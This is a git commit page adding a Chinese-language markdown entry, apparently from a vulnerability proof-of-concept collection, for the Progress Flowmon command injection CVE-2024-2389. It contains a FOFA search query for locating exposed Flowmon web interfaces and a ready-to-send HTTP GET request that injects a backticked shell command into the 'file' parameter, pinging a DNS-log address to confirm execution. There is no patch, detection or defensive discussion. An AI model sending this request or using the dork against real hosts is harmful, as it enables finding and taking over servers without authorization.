Create Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

wy876 · Apr 27, 2024 · f551251 · f551251
1 parent b3ff71e
commit f551251
Showing 1 changed file with 19 additions and 0 deletions.
diff --git a/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md b/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md
@@ -0,0 +1,19 @@
+## Progress-Flowmon命令注入漏洞(CVE-2024-2389)
+
+
+## fofa
+```
+body="Flowmon-Web-Interface"
+```
+
+
+## poc
+```
+GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+```